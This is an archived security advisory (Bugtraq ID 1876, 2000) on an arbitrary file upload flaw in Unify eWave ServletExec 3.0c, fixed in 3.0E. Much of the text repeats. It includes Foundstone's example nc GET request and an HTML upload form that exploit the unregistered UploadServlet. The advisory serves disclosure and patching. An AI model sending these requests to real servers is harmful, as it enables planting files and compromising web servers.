Unify eWave ServletExec File Upload Vulnerability
BID:1876
Info
Unify eWave ServletExec File Upload Vulnerability
| Bugtraq ID: | 1876 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2000 12:00AM |
| Updated: | Oct 31 2000 12:00AM |
| Credit: | Discovered and posted in a Foundstone Labs <[email protected]> Security Advisory <FS-103100-16-SRVX> on Oct 31, 2000. |
| Vulnerable: |
Unify eWave ServletExec 3.0 c |
| Not Vulnerable: | |
Discussion
Unify eWave ServletExec File Upload Vulnerability
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
ServletExec contains an unregistered servlet called 'UploadServlet'. By requesting a specially formed HTTP or 'GET' request, it is possible for a remote user to upload any file to any directory on the server where ServletExec resides. This vulnerability can also be exploited if a user creates an HTML form on their local system and from that point use the servlet in question to upload any arbitrary file.
Successful exploitation of this vulnerability could lead to a compromise of the web server.
The following examples are provided by Foundstone Labs <[email protected]>:
HTTP and 'GET' request:
nc target
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
or
http://target/servlet/com.unify.ewave.servletexec.UploadServlet
HTML form:
<FORM METHOD=POST ENCTYPE='multipart/form-data'
ACTION='http://target/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
ServletExec contains an unregistered servlet called 'UploadServlet'. By requesting a specially formed HTTP or 'GET' request, it is possible for a remote user to upload any file to any directory on the server where ServletExec resides. This vulnerability can also be exploited if a user creates an HTML form on their local system and from that point use the servlet in question to upload any arbitrary file.
Successful exploitation of this vulnerability could lead to a compromise of the web server.
The following examples are provided by Foundstone Labs <[email protected]>:
HTTP and 'GET' request:
nc target
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
or
http://target/servlet/com.unify.ewave.servletexec.UploadServlet
HTML form:
<FORM METHOD=POST ENCTYPE='multipart/form-data'
ACTION='http://target/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>
Exploit / POC
Unify eWave ServletExec File Upload Vulnerability
Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution / Fix
Unify eWave ServletExec File Upload Vulnerability
Solution:
This vulnerability has been addressed in ServletExec version 3.0E.
Solution:
This vulnerability has been addressed in ServletExec version 3.0E.
References
Unify eWave ServletExec File Upload Vulnerability
References:
References: